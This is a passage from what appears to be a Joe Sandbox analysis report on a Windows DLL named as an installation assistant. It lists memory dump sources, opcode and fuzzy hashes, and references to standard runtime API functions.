                                          • Instruction Fuzzy Hash: 2D519573E208314AD79CCE24DC2177572D2E784310F8BC1B99D4BAB6E6CD78589087C4
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                          • Instruction ID: 2d53bde53788f00f72950e8903c418ea5595bf6805a579a08ce71532dcef272a
                                          • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                          • Instruction Fuzzy Hash: 92524E31608B858BD329CF2AC69466AB7E2BB95308F144E2DD4DAC7F41DB70F845CB49
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                          • Instruction ID: c2d137120552fdef550a9b02bf95f98fd2d1ef6df0878e8d695477891d2c1d19
                                          • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                          • Instruction Fuzzy Hash: 5162F3B1A093458FC724CF19C68065EBBE2BFC8744F149E2EE89987714E770E845CB62
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                          • Instruction ID: e3356cba2816989ce45cfa86c0ba219d1a6c057bb97d370bb4c8fd4c4026e9ce
                                          • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                          • Instruction Fuzzy Hash: 0C126A712097458BC728CF2AC6E066EBBE2BFC8344F64892DE99687F41D731E845CB51
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                          • Instruction ID: aa55a0abe9cec5f4b98a2673b19978a1067ffe0604fde21ea2d5788e79ec98c2
                                          • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                          • Instruction Fuzzy Hash: D602D732A082118BD339CE28C5D025DBBE2FBC4355F194F2EE49697A94E7749844CFA2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                          • Instruction ID: 25f7ba54df7da32d12fb680d59f810b88f0cc0639ba1fdf05065ca66bfe20b5c
                                          • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                          • Instruction Fuzzy Hash: 25F113326042888BEB74CE28D5907EEB7E2FBD5304F94493DD889CBB41DB75950AC792
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                          • Instruction ID: c88e392dfc290d5bec6162d7d7043f81f9ea8f28dfb9b688fa3a80d9ddc05bde
                                          • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                          • Instruction Fuzzy Hash: BBD100715046168FD328CF1EC594736BBE2EF96304F054ABDD9A28BB9AD734E905CB40
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                          • Instruction ID: 0b816ed6aaf62aae4c7b0a54c98e39bf1323d03e4373e153e032bd7ea7a68cfa
                                          • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                          • Instruction Fuzzy Hash: 6EC1E5352047458BC328CE3ED1E4696BBE2AFDA314F148AADC4CA4BF55DA34A80DCB55
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                          • Instruction ID: 55ca8c370476e8cc77d6d5934f032d22fe5f29cfa399d6319146191820c9b71c
                                          • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                          • Instruction Fuzzy Hash: 94B1EE31304B054BD375DE39CA907EAB7E1AF80308F80493DC9AA87B81EFB4A519C795
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                          • Instruction ID: e69452ca2dccc3c3d3dc5d360779c607e532c9683d27a9d31a477071da0eeec6
                                          • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                          • Instruction Fuzzy Hash: B7B1AC756047028BC314DF2AC9806ABF7E2FFC8304F54892DD49AC7B12E771A55ACB95
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                          • Instruction ID: e3bfbffa7cc96a14d378d18317abb8ef3754d89d0837a9616b952dab427cdc4a
                                          • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                          • Instruction Fuzzy Hash: E7A1D57160C7418FC325CF2AC5D069ABBE1ABD5318F544E2DE4DAC7B81D631E94ACB42
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                          • Instruction ID: 1829b15b7dc6f0edad6df5d0685835eee73ad1b9d3603ebf21f40997f116e60d
                                          • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                          • Instruction Fuzzy Hash: 1581C335A047058FC320CF2AC180256F7E1FF99714F28CA6DC5999BB55E772E94ACB81
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                          • Instruction ID: 145365216ea2f93b859c3e88fe885b405c6ab4e5d0b21374983a9f4674e42de7
                                          • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                          • Instruction Fuzzy Hash: C3519C72F006099BDB18CE98DEA26EDBBF2EB88308F248569D511E7781D7749B41CB50
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                          • Instruction ID: d1a05dd2d2a8ca25ad7a70f134c7c20b80f126839ca24457313beb82bacf77ba
                                          • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                          • Instruction Fuzzy Hash: 683114277A440103CB1CCD3BCD1679F91535BD426AB0ECF396C05DEF56D96CC8124144
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                          • Instruction ID: ba7e1ab37d9a745b703ececfdddaba1531a73bd8c72a17b25a4997130bbb3972
                                          • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                          • Instruction Fuzzy Hash: 1D219077320A0647E74C8A38D93737532D0A705318F98A62DEA6BCE2C2D73AC457C385
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a6ed76600b72a78fc990690e6a7e456086fcb20ecf18423b9384965bdb87ec7
                                          • Instruction ID: 59e383a2c4e72734746665960f6ac0678a9d91241c70ded0d07c2da8b04350b2
                                          • Opcode Fuzzy Hash: 8a6ed76600b72a78fc990690e6a7e456086fcb20ecf18423b9384965bdb87ec7
                                          • Instruction Fuzzy Hash: 63F03072B153249FCB52DA48D60AB8973BCEB45B6AF1100A6E505EB641C7B0DE40C7D1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                          • Instruction ID: 9fc5541ea1287d1156c68672181f172f323c7306d962fa06990ad6986fd21197
                                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                          • Instruction Fuzzy Hash: AEE08C72A16639FFCB15EB88CA49D8AB3ECEB44B09B1104A6B501E3610D270DF00C7D1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                          • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                          • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                          • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                          • API String ID: 3519838083-609671
                                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                          • Instruction ID: 3c8e579d51a74d02a0a27ce886d113152ea444e5fed00965dba1fb6a28bc2f6f
                                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                          • Instruction Fuzzy Hash: C0D1A571A0820BDFCB21CFA4DA88AEDB7F5FF45318F144969E455A3E50DB709948CBA0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv$H_prolog
                                          • String ID: >WJ$x$x
                                          • API String ID: 2300968129-3162267903
                                          • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                          • Instruction ID: ad5ab63c4a9d557eafe5c981f7fe0f2d00f1cfe9d920d28647792637c504be89
                                          • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                          • Instruction Fuzzy Hash: 39125C71A00219EFDF20DFA8CE84ADDBBB5FF08318F248969E815A7650D7359985CB50
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 6C7B9B07
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C7B9B0F
                                          • _ValidateLocalCookies.LIBCMT ref: 6C7B9B98
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C7B9BC3
                                          • _ValidateLocalCookies.LIBCMT ref: 6C7B9C18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 32187db4ca6be7d0da7a5ce7dbf665e9099f5953d1fab8371fb6c2293399f74e
                                          • Instruction ID: dc46b2b63db2d039dc05222679c52a8e9fe37d745c8b626623069411177c8067
                                          • Opcode Fuzzy Hash: 32187db4ca6be7d0da7a5ce7dbf665e9099f5953d1fab8371fb6c2293399f74e
                                          • Instruction Fuzzy Hash: 1941E630A102199FCF00DF68CA88ADF7BB5BF66318F148565E825BB751DB31EA05CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: dad421a43ef317d285808c9f82830316e7f1bca460a745af1f81a922597331cc
                                          • Instruction ID: b134f17f4e0ef852b6c492079cb69f6a7b6c136bbbdcb59f3f0307d1f5e80d68
                                          • Opcode Fuzzy Hash: dad421a43ef317d285808c9f82830316e7f1bca460a745af1f81a922597331cc
                                          • Instruction Fuzzy Hash: 7321D832F16613AFDB114B69CEC4A3A37A8AF06768F150671F855E7A90D730DF0086E2
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,6C7CB0D0,?), ref: 6C7CBEF9
                                          • __fassign.LIBCMT ref: 6C7CC0D8
                                          • __fassign.LIBCMT ref: 6C7CC0F5
                                          • WriteFile.KERNEL32(?,6C7D5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7CC13D
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C7CC17D
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7CC229
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                          • String ID:
                                          • API String ID: 4031098158-0
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C682F95
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C682FAF
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C682FD0
                                          • __Getctype.LIBCPMT ref: 6C683084
                                          • std::_Facet_Register.LIBCPMT ref: 6C68309C
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C6830B7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                          • String ID:
                                          • API String ID: 1102183713-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv$__aullrem
                                          • String ID:
                                          • API String ID: 2022606265-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C7FA6F1
                                            • Part of subcall function 6C809173: __EH_prolog.LIBCMT ref: 6C809178
                                          • __EH_prolog.LIBCMT ref: 6C7FA8F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: IJ$WIJ$J
                                          • API String ID: 3519838083-740443243
                                          APIs
